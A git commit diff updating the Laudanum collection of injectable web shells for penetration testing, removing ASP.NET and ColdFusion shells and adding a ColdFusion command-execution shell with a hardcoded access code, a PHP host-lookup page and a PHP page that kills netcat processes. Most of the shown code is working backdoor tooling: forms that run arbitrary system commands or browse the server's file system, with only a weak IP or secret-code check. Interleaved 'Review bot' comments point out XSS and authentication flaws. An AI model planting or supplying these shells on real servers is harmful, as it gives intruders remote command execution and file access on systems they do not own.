updated to laudanum v1.0

Jitendra Patro 2023-05-18 17:39:10 +05:30
parent 39657bcc05
commit 465897e556
34 changed files with 2119 additions and 428 deletions


@ -1,144 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "", "" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
if (!validIp) {
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
if (s == qType)
validType = true;
if (!validType)
qType = "Any";
if (Request.Form["query"] != null)
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
foreach (string s in qtypes)
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
<input type="submit"><br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<pre><% = stderr.Replace("<", "&lt;") %></pre>


@ -1,154 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "",""};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
foreach (string ip in allowedIPs)
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
allowed = true;
if (!allowed)
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
if (System.IO.File.Exists(file))
void writefile()
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
void die() {
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
if (b.Length > 0)
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");
if (System.IO.Directory.Exists(dir))
string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders)
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
catch (System.UnauthorizedAccessException ex)
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files)
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");


@ -1,80 +0,0 @@
<cfapplication scriptProtect="none">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
*** TODO: Fix the problem with quotes
*** Add authentication
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<cfif #cgi.remote_addr# neq "">
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
<head><title>Laudanum Coldfusion Shell</title></head>
<form action="shell.cfm" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
<input type="submit">
<cfif IsDefined("form.cmd")>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -2,16 +2,14 @@ The Team
- Kevin Johnson
- Project Lead
- Justin Searle
- Core Developer
- Tim Medin
- Core Developer
- Project Lead
- James Jardine
- Core Developer
- Justin Searle
- Core Developer
Additional Coding
- Robin Wood
- Jason Gillam (Wordpress Plugin)


@ -1,4 +1,4 @@
Laudanum: Injectable Web Exploit Code v0.4
Laudanum: Injectable Web Exploit Code v0.8
By Kevin Johnson <kjohnson@secureideas.net>
and the Laudanum Development Team
@ -9,7 +9,7 @@ Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by


@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -143,7 +143,7 @@ end if
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -170,7 +170,7 @@ next
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -74,7 +74,7 @@ function err_handler()
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -341,7 +341,7 @@ if len(FullUrl) = 0 then
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' *** Updated and fixed by Tim Medin <tim@counterhack.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -75,7 +75,7 @@ Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -14,9 +14,9 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
@ -120,10 +120,10 @@ STDERR:<br/>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -0,0 +1,99 @@
<cfapplication scriptProtect="none">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
*** Modified by Matt Presson <@matt_presson>
*** - Added some basic authentication via HTTP header
*** - Resolved cfexecute stripping quotes
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<cfset secretCode = "a208bddb1f68aa8a8641b65d93979740c82fb387" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->
<cfset QuoteMark = "'" />
<cfset DoubleQuoteMark = """" />
<!--- Authentication: Check for the GUID in either a custom header or POSTed by the form --->
<cfset suppliedCode = "" />
<cfif structKeyExists(GetHttpRequestData().headers, "X-Auth-Code")>
<cfset suppliedCode = "#StructFind(GetHttpRequestData().headers, "X-Auth-Code")#" />
<cfelseif structKeyExists(FORM, "authCode")>
<cfset suppliedCode = "#StructFind(FORM, "authCode")#" />
<cfif ( #suppliedCode# neq secretCode )>
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
<head><title>Laudanum Coldfusion Shell</title></head>
<form action="<cfoutput>#cgi.script_name#</cfoutput>" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
<input type="hidden" name="authCode" value="<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>">
<input type="submit">
<!--- Updated the call to cfexecute so use an array instead of a string. This way quotes are not stripped. --->
<cfif IsDefined("form.cmd")>
<cfset argumentsArray = #listToArray(form.arguments, " ")# />
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#argumentsArray#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Bug fixes by Matt Presson<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
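Review bot: The `secretCode` assigned near the top of this new file is a fixed value published in the repository, so any copy deployed without editing that line accepts a code that anyone can read here. Shipping it empty and failing closed avoids the shared default: `<cfif len(secretCode) eq 0 or compare(suppliedCode, secretCode) neq 0>`. `compare()` is also case-sensitive, whereas `neq` compares strings without regard to case. The closing "Note: ... strips quotes" text looks stale, since the header comment says the quote stripping was resolved. The header comment should also tell the tester to remove the file when the engagement ends.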


@ -34,7 +34,7 @@ disr = dis.readLine();
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -10,14 +10,14 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -152,7 +152,7 @@ if ($query != '')
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -10,14 +10,15 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder
*** This program is free software; you can redistribute it and/or
@ -79,7 +80,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -150,7 +151,7 @@ for ($i = 0; $i < count($dirs) - 2; $i++) {
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=$parentdir\">../</a></td><td> </td><td> </td></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
@ -187,7 +188,7 @@ else {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
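Review bot: The rewritten `../` link in the `@ -150,7 +151,7 @` hunk still places `$_SERVER['PHP_SELF']` and `$parentdir` into the `href` without encoding; switching from interpolation to concatenation does not change what is emitted. `$parentdir` is built outside the visible lines and presumably derives from the `dir` request parameter, so a quote or angle bracket in it would break out of the attribute. Suggested form: `echo "<tr><td><a href=\"" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) . "?dir=" . urlencode($parentdir) . "\">../</a></td><td> </td><td> </td></tr>";`.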


@ -0,0 +1,142 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a host lookup by ip address.
*** Adapted from Laudanum dns.php by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("", "");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
$allowed = 1;
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
<input type="submit" value="Submit">
if ($query != '')
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
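Review bot: The form's `action` attribute echoes `$_SERVER['PHP_SELF']` without encoding, so path info appended to the request URL is reflected into the page; `<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) ?>` closes that. The error page built in `error_handler` has the same problem with `$errstr` and `$errfile`. `$query` also reaches `gethostbyaddr()` unvalidated, so a guard such as `if ($query != '' && filter_var($query, FILTER_VALIDATE_IP))` would reject malformed input before the lookup. `$type` is assigned but not used in the visible lines, and the footer credits a different author than the header comment. The rendered section omits some lines (the echo of `$result` is not visible), so whether the result is encoded on output cannot be confirmed from here.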


@ -0,0 +1,119 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("", "");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
$allowed = 1;
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
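Review bot: `exec('killall nc')` runs on every request that passes the IP check, including a plain GET, so a link prefetch or a cross-site image tag loaded from an allowed address triggers the kill without the tester intending it. Putting the call behind a submit button and `if ($_SERVER['REQUEST_METHOD'] === 'POST')` would make the action deliberate, and the echoed output should go through `htmlspecialchars()`. The error page title still reads "Laudanum PHP Hostname by IP Lookup", and the `error_handler` comment refers to a `chdir()` call that is not visible in this file; both look copied from another tool and should be updated. The header comment could also state that `killall nc` matches by process name, so it may signal `nc` processes the tester did not start.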


@ -11,14 +11,14 @@ ini_set('session.use_cookies', '0');
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
@ -81,7 +81,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -268,7 +268,7 @@ if ($url == "") {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -10,9 +10,9 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
